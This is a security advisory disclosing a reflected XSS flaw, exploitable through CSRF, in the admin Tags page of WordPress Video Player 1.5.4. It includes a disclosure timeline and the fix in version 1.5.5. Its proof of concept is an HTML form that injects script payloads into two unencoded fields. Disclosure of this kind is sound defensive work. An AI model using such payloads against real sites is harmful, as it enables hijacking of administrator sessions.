WordPress Video Player 1.5.4, Reflected XSS
The ‘Tags’ section of ‘WordPress Video Player’ under WordPress Administration contains a two fields that are vulnerable to a Reflected XSS attack. This is due to the fact that the value passed through to these fields are not encoded prior to output. There is also no nonce on this page, which means the XSS can be triggered via CSRF.
Homepage
https://wordpress.org/plugins/player/
CVSS Score
4.3
CSSS Vector
(AV:N/AC:M/Au:N/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 1.5.5.
Proof of Concept
<form action="http://localhost/wp-admin/admin.php?page=Tags_Spider_Video_Player" method="post" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="asc_or_desc" value='"><script>alert(1)</script>'/>
<input type="hidden" name="order_by" value='"><script>alert(2)</script>'/>
<input type="submit" value="Submit"/>
</form>
Timeline
- 2015-01-15: Discovered
- 2015-01-15: Vendor notified
- 2015-01-16: Vendor responded
- 2015-01-16: Version 1.5.5 released – issue resolved
- 2015-01-16: CVE Requested
- 2015-02-02: Advisory released